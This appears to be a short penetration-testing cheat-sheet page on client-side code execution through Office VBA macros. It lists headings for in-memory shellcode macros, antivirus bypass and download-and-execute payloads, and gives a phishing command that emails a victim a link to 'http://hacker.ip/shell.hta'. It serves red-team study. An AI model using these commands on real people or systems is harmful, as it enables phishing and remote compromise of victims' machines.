Client Side Code Execution

VBA Macro in MS Office

Send email

sendemail -f [email protected] -t [email protected] -s victim.ip -u "Subject" -m "Help: http://hacker.ip/shell.hta"

Run from Web Server through Powershell In-Memory

kali host web server:
python -m http.server 80
scope = document
Powershell Inside VBA

In-Memory Shellcode VBA Macro without .exe

The shell dies when closing the doc; resolve by AutoMigrate module in MSF

VBA AV Bypass

VBA .exe Shellcode Download & Execute on Disk

Last updated